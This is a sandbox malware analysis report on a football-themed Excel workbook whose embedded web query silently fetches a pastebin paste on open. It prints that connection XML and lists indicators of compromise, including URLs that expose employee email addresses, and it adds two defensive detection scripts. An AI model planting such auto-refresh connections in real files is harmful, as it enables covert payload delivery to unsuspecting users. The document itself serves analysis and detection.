

Analysis Report FIFA World Cup 2018 - Play offs.xlsx

Overview

General Information

Joe Sandbox Version:26.0.0 Aquamarine
Analysis ID:898172
Start date:28.06.2019
Start time:14:00:06
Joe Sandbox Product:Cloud
Overall analysis duration:0h 4m 33s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:FIFA World Cup 2018 - Play offs.xlsx
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2013 Professional, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed:3
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal48.troj.winXLSX@1/8@1/1
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Excluded IPs from analysis (whitelisted): 23.10.249.18, 23.10.249.25, 93.184.221.240, 13.107.4.50, 104.41.216.206, 65.52.199.96, 65.52.196.196, 205.185.216.10, 205.185.216.42, 104.94.183.45, 23.54.115.197
  • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, a1363.dscg.akamai.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, e3673.dscg.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, crl.www.ms.akadns.net, wu.azureedge.net, m-vnext.sqlazurelabs.com, e11290.dspg.akamaiedge.net, au.au-msedge.net, go.microsoft.com, download.microsoft.com.edgekey.net, main.dl.ms.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, go.microsoft.com.edgekey.net, hlb.apr-52dd2-0.edgecastdns.net, au.c-0001.c-msedge.net, download.microsoft.com, crl.microsoft.com, wu.wpc.apr-52dd2.edgecastdns.net
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

Strategy: Threshold
Score: 48
Range: 0 - 100
Whitelisted: false
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Mitre Att&ck Matrix

Techniques are grouped by tactic (one column of the matrix per line). A count in parentheses is the number of signatures in this analysis mapped to that technique; techniques without a count are the matrix cells that did not match.

Initial Access: Valid Accounts, Replication Through Removable Media, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link
Execution: Exploitation for Client Execution (4), Service Execution, Windows Management Instrumentation, Scheduled Task, Command-Line Interface
Persistence: Modify Existing Service (2), New Service (1), Accessibility Features, System Firmware, Shortcut Modification
Privilege Escalation: New Service (1), Accessibility Features, Path Interception, DLL Search Order Hijacking, File System Permissions Weakness
Defense Evasion: Web Service (1), Binary Padding, Rootkit, Obfuscated Files or Information, Masquerading
Credential Access: Credential Dumping, Network Sniffing, Input Capture, Credentials in Files, Account Manipulation
Discovery: Process Discovery (1), File and Directory Discovery (1), Query Registry, System Network Configuration Discovery, Remote System Discovery
Lateral Movement: Remote File Copy (2), Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Data Staged
Exfiltration: Data Encrypted (1), Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted, Scheduled Transfer
Command and Control: Web Service (1), Standard Cryptographic Protocol (1), Standard Non-Application Layer Protocol (3), Standard Application Layer Protocol (13), Remote File Copy (2)

Signature Overview

Click to jump to signature section


Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe | Memory has grown: Private usage: 3MB later: 100MB
Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: pastebin.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.1.94:49196 -> 104.20.208.21:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.1.94:49196 -> 104.20.208.21:443

Note: these four heuristics fire on memory growth and network activity alone. Nothing else in this report corroborates a memory-corruption exploit (no Yara matches, no dropped or unpacked PE files, and EXCEL.EXE is the only process in the behavior graph), and the DNS query and TLS connection are fully explained by the auto-refreshing web query in xl/connections.xml listed under System Summary.

Networking:

Connects to a pastebin service (likely for C&C)
Source: unknown | DNS query: name: pastebin.com
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 104.20.208.21
Note: 104.20.208.21 is the Cloudflare-fronted address of pastebin.com; the context section below shows the same domain resolving to 104.20.208.21 or 104.20.209.21 for many unrelated samples, so the reusable indicator is the raw-paste URL, not the IP.
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Note: a JA3 hash characterises the TLS client stack (here EXCEL.EXE on the Windows 7 analysis image), so it is shared by every sample, benign or not, that uses the same stack on the same OS.
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected:
  GET /raw/PX31NCah HTTP/1.1
  Accept: text/html, text/plain, text/xml
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)
  Accept-Encoding: gzip, deflate
  Host: pastebin.com
  Connection: Keep-Alive
  Cookie: __cfduid=d077fe119c9a9683a5d83d489f4961b011561723337
Note: the User-Agent ends in the "ms-office" token that Office's own WinINet requests carry, which is what separates an Office-initiated fetch from a browser visiting the same URL; __cfduid is Cloudflare's cookie and carries no information about the sample.
Downloads files
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EAYYUSJB\PX31NCah[1].txt
Note: this is the WinINet cache copy of the paste body, i.e. the content the workbook actually loaded; the report does not show its contents.
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: the same GET /raw/PX31NCah request to pastebin.com shown above
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: pastebin.com
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49197
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49196
Source: unknown | Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49197 -> 443
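The request captured above carries the "ms-office" User-Agent token and targets a raw paste. The following Python script, added here as an example and not part of Joe Sandbox or of this report, turns that combination into a proxy-log detection. The log format and all sample lines are constructed (the first line reproduces the captured request), the allowlist of Microsoft domains and the list of paste hosts are assumptions, and URLs are assumed visible because the proxy inspects TLS or the telemetry comes from the endpoint; a CONNECT-only proxy log would expose the host but not the path.

```python
"""Flag Office-originated fetches from paste services in web proxy logs.

Added example for this report, not part of Joe Sandbox. The log format, the
sample lines, the Microsoft allowlist and the paste-host list are assumptions
made for illustration.
"""
import re
from urllib.parse import urlsplit

# Office's WinINet requests carry an "ms-office" token in the User-Agent.
OFFICE_UA = re.compile(r"\bms-office\b")

# Paste / raw-text hosts. pastebin.com is the one in this report; extend as needed.
PASTE_HOSTS = ("pastebin.com",)
RAW_PATH = re.compile(r"^/raw/[A-Za-z0-9]+$")

# Hosts Office legitimately contacts with the same User-Agent (assumed allowlist).
ALLOWED_SUFFIXES = ("microsoft.com", "office.com", "office.net", "live.com")

# Constructed log lines: timestamp, client, method, URL, status, user agent (tab-separated).
SAMPLE_LOG = [
    "2019-06-28T14:00:37Z\t192.168.1.94\tGET\thttps://pastebin.com/raw/PX31NCah\t200\t"
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
    ".NET4.0C; .NET4.0E; ms-office)",
    "2019-06-28T14:01:02Z\t192.168.1.57\tGET\thttps://pastebin.com/raw/AbCdEf12\t200\t"
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/55.0.2883.87 Safari/537.36",
    "2019-06-28T14:01:15Z\t192.168.1.94\tGET\thttps://officecdn.microsoft.com/pr/help.xml\t200\t"
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; ms-office)",
    "2019-06-28T14:02:40Z\t192.168.1.94\tGET\thttps://files.example.net/prices.csv\t200\t"
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; ms-office)",
]


def in_domain(host: str, suffixes) -> bool:
    """True when host equals, or is a subdomain of, any of the suffixes."""
    return any(host == s or host.endswith("." + s) for s in suffixes)


def parse_line(line: str) -> dict:
    """Split one constructed log line into fields."""
    ts, client, method, url, status, ua = line.rstrip("\n").split("\t", 5)
    parts = urlsplit(url)
    return {"ts": ts, "client": client, "method": method, "url": url,
            "host": (parts.hostname or "").lower(), "path": parts.path,
            "status": int(status), "ua": ua}


def classify(ev: dict) -> tuple:
    """Return (severity, reasons); severity is 'none' when nothing fires."""
    reasons = []
    if not OFFICE_UA.search(ev["ua"]):
        return "none", reasons            # browser traffic is out of scope for this rule
    if in_domain(ev["host"], ALLOWED_SUFFIXES):
        return "none", reasons            # Office talking to Microsoft is expected
    reasons.append("office-user-agent")
    if in_domain(ev["host"], PASTE_HOSTS):
        reasons.append("paste-service")
    if RAW_PATH.match(ev["path"]):
        reasons.append("raw-paste-path")
    severity = "high" if "paste-service" in reasons else "medium"
    return severity, reasons


def detect(lines) -> list:
    """Alerts for lines where an Office process itself pulled content from outside."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        severity, reasons = classify(ev)
        if severity != "none":
            alerts.append({"severity": severity, "client": ev["client"],
                           "url": ev["url"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a["severity"].upper(), a["client"], a["url"], ",".join(a["reasons"]))
```

Run against the four constructed lines, the script raises a high-severity alert for the Office fetch of pastebin.com/raw/PX31NCah, a medium one for the Office fetch from the unknown host, and nothing for the Chrome request to a paste or the Office request to a Microsoft CDN. The medium tier matters because the same web-query mechanism works with any host; the paste service is just the one this sample used.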

System Summary:

Document uses Power Query (might be used to download and execute payloads)
Source: connections.xml | Binary string:
  <connections xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="xr16" xmlns:xr16="http://schemas.microsoft.com/office/spreadsheetml/2017/revision16">
    <connection id="1" xr16:uid="{7AD9A800-E2BC-4BB2-97BE-52BFEF17D112}" name="Connection" type="4" refreshedVersion="6" background="1" refreshOnLoad="1">
      <webPr sourceData="1" parsePre="1" consecutive="1" xl2000="1" url="https://pastebin.com/raw/PX31NCah"/>
    </connection>
  </connections>
Note on the signature name: what the XML shows is a legacy External Data web query rather than a Power Query mashup. type="4" is the SpreadsheetML "web" connection type, the <webPr> element carries the URL, and xl/queryTables/queryTable1.xml listed below is the matching query table; a Power Query connection would instead store M code in a DataMashup part under customXml/. The attributes that matter are refreshOnLoad="1" and background="1": Excel requests https://pastebin.com/raw/PX31NCah as soon as the workbook is opened, without user interaction, which is exactly the DNS query and TLS connection recorded under Networking, and writes whatever the paste contained into the sheet. On a default Office install the Trust Center blocks external data connections behind a notification bar until the user enables content; the analysis environment allowed the refresh here.
Classification label
Source: classification engine | Classification label: mal48.troj.winXLSX@1/8@1/1
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE | File created: C:\Users\user\AppData\Local\microsoft\office\OTeleData_2056_1.etl
Creates temporary files
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE | File created: C:\Users\user~1\AppData\Local\Temp\CVR6801.tmp
Parts of this application are using the .NET runtime (Probably coded in C#)
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f0b6809bb6f55335a810ec4f96f2cbcf\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\7a02999e99bdbc5c868eb509a3a2a269\mscorlib.ni.dll
Reads ini files
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE | File read: C:\Users\desktop.ini
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Note: mscorrc.dll is the .NET runtime's resource library; no Silverlight component appears anywhere in this report.
Document is a ZIP file with path names indicative of goodware
Source: FIFA World Cup 2018 - Play offs.xlsx | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: FIFA World Cup 2018 - Play offs.xlsx | Initial sample: OLE zip file path = xl/connections.xml
Source: FIFA World Cup 2018 - Play offs.xlsx | Initial sample: OLE zip file path = xl/queryTables/queryTable1.xml
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll
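To check a workbook for this kind of auto-refreshing connection without opening it in Excel, the following Python script, added here as an example and not code from Joe Sandbox, unpacks the .xlsx container and walks xl/connections.xml. The workbook it inspects is constructed in memory from the connections.xml quoted above; the remaining parts are stub placeholders, and the paste-host list and severity labels are assumptions. It also reports whether a customXml DataMashup part (Power Query proper) is present, which this sample does not have.

```python
"""Static triage of an .xlsx for external data connections that refresh on open.

Added example for this report, not code from Joe Sandbox. The workbook is
rebuilt in memory from the connections.xml quoted in the report; every other
part is a constructed stub. Paste-host list and severity labels are assumptions.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

SML = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"

# ST_ConnectionType (ECMA-376 Part 1, 18.18.16); type="4" is a legacy web query.
CONNECTION_TYPES = {"1": "odbc", "2": "dao", "3": "file", "4": "web",
                    "5": "oledb", "6": "text", "7": "ads", "8": "dsp"}

# Paste / raw-text hosts; pastebin.com is the one in this report (assumed list).
PASTE_HOSTS = ("pastebin.com",)

# xl/connections.xml exactly as quoted in the report.
CONNECTIONS_XML = (
    '<connections xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
    'xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" '
    'mc:Ignorable="xr16" '
    'xmlns:xr16="http://schemas.microsoft.com/office/spreadsheetml/2017/revision16">'
    '<connection id="1" xr16:uid="{7AD9A800-E2BC-4BB2-97BE-52BFEF17D112}" '
    'name="Connection" type="4" refreshedVersion="6" background="1" refreshOnLoad="1">'
    '<webPr sourceData="1" parsePre="1" consecutive="1" xl2000="1" '
    'url="https://pastebin.com/raw/PX31NCah"/></connection></connections>'
)


def build_sample_xlsx(with_connection: bool = True) -> bytes:
    """Constructed workbook containing only the parts this triage looks at."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        if with_connection:
            zf.writestr("xl/connections.xml", CONNECTIONS_XML)
            zf.writestr("xl/queryTables/queryTable1.xml", "<queryTable/>")
    return buf.getvalue()


def external_connections(xlsx_bytes: bytes) -> list:
    """One record per <connection> in xl/connections.xml; empty list if the part is absent."""
    records = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        names = set(zf.namelist())
        # Power Query (Get & Transform) keeps its M code in a DataMashup blob
        # under customXml/; a legacy web query has no such part.
        has_mashup = any(n.startswith("customXml/") and b"DataMashup" in zf.read(n)
                         for n in names)
        if "xl/connections.xml" not in names:
            return records
        root = ET.fromstring(zf.read("xl/connections.xml"))
        for conn in root.iter(f"{{{SML}}}connection"):
            web = conn.find(f"{{{SML}}}webPr")
            db = conn.find(f"{{{SML}}}dbPr")
            records.append({
                "name": conn.get("name"),
                "type": CONNECTION_TYPES.get(conn.get("type", ""), "unknown"),
                "refresh_on_load": conn.get("refreshOnLoad") == "1",
                "background": conn.get("background") == "1",
                "url": web.get("url") if web is not None else None,
                "connection_string": db.get("connection") if db is not None else None,
                "power_query": has_mashup,
            })
    return records


def triage(xlsx_bytes: bytes) -> list:
    """Human-readable findings; an empty list means nothing fetches on open."""
    findings = []
    for c in external_connections(xlsx_bytes):
        target = c["url"] or c["connection_string"]
        if not target:
            continue
        host = (urlsplit(target).hostname or "").lower()
        paste = any(host == h or host.endswith("." + h) for h in PASTE_HOSTS)
        if c["refresh_on_load"]:
            sev = "HIGH" if paste else "MEDIUM"
            findings.append(f"{sev}: connection '{c['name']}' ({c['type']}) "
                            f"auto-refreshes on open from {target}")
        else:
            findings.append(f"LOW: connection '{c['name']}' ({c['type']}) "
                            f"points at {target} (manual refresh only)")
    return findings


if __name__ == "__main__":
    for line in triage(build_sample_xlsx()):
        print(line)
```

For this sample the triage returns a single HIGH finding naming the web query and its pastebin URL, and the same workbook without the connection part returns nothing. The xml.etree parser does not resolve external entities, so the script is safe to run on untrusted files; it deliberately reads only the XML parts and never invokes Excel.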

Boot Survival:

Creates or modifies windows services
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE | Registry key created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\15.0\ClickToRun\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\ASP.NET_4.0.30319\Names
Modifies existing windows services
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE | Registry key value modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\15.0\ClickToRun\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\ASP.NET_4.0.30319\Names
Note: both paths sit under HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun\REGISTRY\..., the virtualised registry overlay that Click-to-Run Office 2013 maintains for its own runtime, not under the live HKLM\SYSTEM\CurrentControlSet\Services hive. No Windows service is created or changed, and the signatures do not indicate persistence by the document.

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (148 identical entries; repeats collapsed)
Note: SEM_NOOPENFILEERRORBOX suppresses the "file not found" dialog for failed opens and is set routinely by Office processes; it is not specific to this document.

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE | Thread delayed: delay time: 922337203685477
Note: 922337203685477 ms is the largest positive timeout (2^63 in 100 ns units), the conventional "wait forever" on a synchronisation object; idle Office worker threads park this way, so it is not a timed evasion sleep.
Queries a list of all running processes
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE | Process information queried: ProcessInformation

Anti Debugging:

Enables debug privileges
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE | Process token adjusted: Debug

Behavior Graph

Graph ID: 898172
Sample: FIFA World Cup 2018 - Play offs.xlsx
Start date: 28/06/2019
Architecture: WINDOWS
Score: 48
Signatures attached to the sample node:
  • Document uses Power Query (might be used to download and execute payloads)
  • Connects to a pastebin service (likely for C&C)
Process started from the sample: EXCEL.EXE (node counters 451 / 51)
Network node reached by EXCEL.EXE: pastebin.com, 104.20.208.21, port 443 (client ports 49196, 49197), ASN unknown, United States

Simulations

Behavior and APIs

Time: 14:00:28
Type: API Interceptor
Description: 88x Sleep call for process: EXCEL.EXE modified

Antivirus and Machine Learning Detection

Initial Sample

Source: FIFA World Cup 2018 - Play offs.xlsx
Detection: 2%
Scanner: virustotal
Label: (none)

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

104.20.208.21 (every listed sample was detected as malicious; context = raw-paste URL fetched in that analysis):
  • gH5B1uCTfZ.exe: pastebin.com/raw/uTLbvk2v
  • Payment Slip.xls: pastebin.com/raw/6fDfe1Ty
  • Eur 72,000.xls: pastebin.com/raw/Cbt2DYUh
  • Payment Slip.xls: pastebin.com/raw/6fDfe1Ty
  • resume2.doc: pastebin.com/raw/Euzk3Ht4
  • Mv Orient pluto_epda.doc: pastebin.com/raw/9t3R1Ng5
  • Eur 72,000.xls: www.pastebin.com/raw/HX72131y

Domains

pastebin.com (every listed sample was detected as malicious; context = IP the domain resolved to in that analysis):
  • TreezyGen.exe: 104.20.209.21
  • UuspOFRFQV.docx: 104.20.209.21
  • gH5B1uCTfZ.exe: 104.20.208.21
  • virus.sh: 104.20.208.21
  • Windows%2010%20Pro%20X64%20Redstone%204%20MULTi-6%20JUNE%202018%20{Gen2}.exe: 104.20.208.21
  • 8ah9igjm9M: 104.20.209.21
  • PO53473.doc: 104.20.209.21
  • 1556085199x1822611307.exe: 104.20.208.21
  • miner.elf: 104.20.208.21
  • 63250ebdf69c4bf280c3b8cc82600a75: 104.20.209.21
  • RSEBBScan0023.doc: 104.20.209.21
  • Payment Slip.xls: 104.20.208.21
  • resume2.doc: 104.20.209.21
  • 49inv. No. 8234 - 21.03.2019.bat: 104.20.209.21
  • miner.elf: 104.20.208.21
  • Documenta#U00c3#U00a7#U00c3#U00a3o.doc: 104.20.209.21
  • Payment Slip.xls: 104.20.209.21
  • c3#U30d7.doc: 104.20.209.21
  • 5Quotation-List.doc: 104.20.209.21
  • cmrDocument.doc: 104.20.208.21

ASN

Match: unknown
Associated samples (Detection: malicious for every entry) and the IP context for each:
  • Invoice0186.pdf: 192.168.0.40
  • P_2038402.xlsx: 192.168.0.44
  • bad.pdf: 192.168.0.44
  • RFQ.pdf: 192.168.0.44
  • 100323.pdf: 192.168.0.44
  • Copy.pdf: 127.0.0.1
  • 2.exe: 192.168.0.40
  • UPPB502981.doc: 192.168.0.44
  • Adm_Boleto.via2.com: 192.168.0.40
  • 00ECF4AD.exe: 192.168.0.40
  • PDF_100987464500.exe: 192.168.0.40
  • filedata.exe: 192.168.0.40
  • .exe: 192.168.1.60
  • 33redacted@threatwave.com: 192.168.1.71

JA3 Fingerprints

Match: 7dcce5b76c8b17472d024758970a406b
Associated samples (Detection: malicious for every entry) and the IP each contacted with this fingerprint:
  • https://na01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fu9307752.ct.sendgrid.net%2Fwf%2Fclick%3Fupn%3DGpYfDGokPDBd7a4JqlZ9WfT6EI7gBzuWWau4Ao6MxveOhDGkTP2NDDF74KIUBot5Xue-2B-2BZzkuyTs-2FMAFOUuOAw-3D-3D_1MpuJKsTcV-2FDn0j31QRy2FUm-2F1QmdDQLjriB9ZlK-2FO7354QSGTGJp-2F-2FkbRrYO9QPGKH-2BrIlGX36oD-2FWNemqQBBXzKC3s4wx4v3zmeUe3tP1DKkVuheGDXlSPY9DuDd1bD-2BdF-2Ft-2FdQQ3XxZYnPyQkw1P8x-2FIPpYp8-2FRcAlMIjkgpQHTBy5fbZOi2ZQBpHgRkAWnRZK36uxr-2FOs822ATyj6U3kJhomCxT8O3oHNLu8qUIbm3EGI89yjNhHWe1PfAmd7VQexgNJD-2FqUzGDF396-2B-2Bvkm-2BffMWxdB3KEuIbJdybnz7QVYkBx3kcdhzFRbxuSAR7jN2OFB50-2FScqEF1M8hAm-2B0P7Bonij00wvHvBCt9Z7tW0hzublbYKEIZLvkeRBNMgdXVTHttutvicMlP6Umlw-3D-3D&data=02%7C01%7Cgenalyn_navarro%40transalta.com%7C1c952194cb3c44b0846d08d6765596aa%7Caff3442b5f55409cbe77da97b366435a%7C0%7C1%7C636826507326727180&sdata=Et8iaZoOla8p6jYVkLpNfiy2FAnaadsrihAL0LiNRNc%3D&reserved=0: 104.20.208.21
  • zTf1CPsXQ5.dll: 104.20.208.21
  • https://na01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fdivingaustralia-my.sharepoint.com%2F%3Aw%3A%2Fr%2Fpersonal%2Ffinance_diving_org_au%2F_layouts%2F15%2FDoc.aspx%3Fsourcedoc%3D%257B8604b0f1-f91a-4f57-a1d4-a13866ae1126%257D%26action%3Ddefault&data=02%7C01%7Cshaun_clifford%40transalta.com%7C55ae28615dbb4510560c08d67800791b%7Caff3442b5f55409cbe77da97b366435a%7C0%7C1%7C636828340784416456&sdata=hTEF%2Bkmzfx6b5O7cG4iyYN1WuJqFA9K9seH4ZzgBZQI%3D&reserved=0: 104.20.208.21
  • https://www.dropbox.com/s/fxkkcv0d2do3urr/Purchase Order.jpg.z?dl=1: 104.20.208.21
  • Pu3xMAg7v8.doc: 104.20.208.21
  • 957043_6ZK2400309.xml: 104.20.208.21
  • INVOICE.doc: 104.20.208.21
  • Operating Agreement 0102282019a00.doc: 104.20.208.21
  • salesrequest321.doc: 104.20.208.21
  • PO53473.doc: 104.20.208.21
  • freeformatter-decode.doc: 104.20.208.21
  • Office365 Audio Conferencin80.doc: 104.20.208.21
  • Voicesea.rtf: 104.20.208.21
  • Quote _ Drawin.doc: 104.20.208.21
  • FMq08TtsCL.exe: 104.20.208.21
  • 370421.doc: 104.20.208.21
  • DHL-Invoice.doc: 104.20.208.21
  • yikxCT3OyK.doc: 104.20.208.21
  • https://headlabzserver.com/.sharepoint: 104.20.208.21
  • RSEBBScan0023.doc: 104.20.208.21

Dropped Files

No context


Startup

  • System is w7_6
  • EXCEL.EXE (PID: 2056 cmdline: 'C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE' /automation -Embedding MD5: D49DA5A2EE723A5D236D4DD6059C37CB)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\15.0\OfficeFileCache\CentralTable.laccdb
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:data
Size (bytes):64
Entropy (8bit):1.4485360556164644
Encrypted:false
MD5:ADE811BE378EEFCC87629FD9974F9EF9
SHA1:10702748280B399FA9D8AB208D3D6568054B1A45
SHA-256:58D9624832F19F8A2B5E38555433A2904BF2E0F6641CB530F417ADB2653F0609
SHA-512:4F940A536FC0C79AD9015D292B708B06370A5C495278DF878E0E86B3E2EF6C1413019D5B1E71452CDD044BD5CBEC49FBA0CD2B28B453909C325DEAC381EED7E3
Malicious:false
Reputation:low
Preview:971342. Admin.
C:\Users\user\AppData\Local\Microsoft\Office\OTeleData_2056_1.etl
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:Targa image data - Map 65536 x 65536 x 0
Size (bytes):66048
Entropy (8bit):0.161519290276026
Encrypted:false
MD5:E9C3E0D56C3CF9A93CF4C9B60036CC50
SHA1:7B9E2350E948EFCED003F1758C25A18D50B5D072
SHA-256:AF994060E8CA61DB2D6D4A300292317BB7058C012410767A4EBA918ADB3160E9
SHA-512:C29F27139120D95F7FBCCA971D7712C2259FA8B8D9042F92A7F8C830AA093C41A3773A0C04D03D3F7C8A80D8C3DDDF876FA346480AA540664E407B76A0259AE7
Malicious:false
Reputation:low
Preview:..........................................................................................;{....................................Zb..2.......................`...............@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1................................................................-....#.....v....-..........O.T.e.l.e.2.0.5.6...C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.m.i.c.r.o.s.o.f.t.\.o.f.f.i.c.e.\.O.T.e.l.e.D.a.t.a._.2.0.5.6._.1...e.t.l...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Office\OTeleData_2056_2.etl
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:Targa image data - Map 65536 x 65536 x 0
Size (bytes):65536
Entropy (8bit):0.09089392634852894
Encrypted:false
MD5:A9AB6FEC130DA08197ED266604594207
SHA1:2EBD9E8103DC25B9558739F3B08CA56C935AE31D
SHA-256:1FCAAD366A5B3EADB1275B06390B0A7BA4AE34CDECBB5EE3F874D575FB581722
SHA-512:5A892B85D6D29A765C0DA0E4A1CE19D6893BC1B4370411717E90C1ED4BA0BDCE04270B77BA177011E2B4130360A63FBF0CA088AD3D7597D38D32E0FE5F94C6F4
Malicious:false
Reputation:low
Preview:..........................................................................................;{....................................Zb..2.......................`...............@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1................................................................-....#.....v....-..........O.T.e.l.e.2.0.5.6...C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.m.i.c.r.o.s.o.f.t.\.o.f.f.i.c.e.\.O.T.e.l.e.D.a.t.a._.2.0.5.6._.2...e.t.l...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Power Query\User.zip
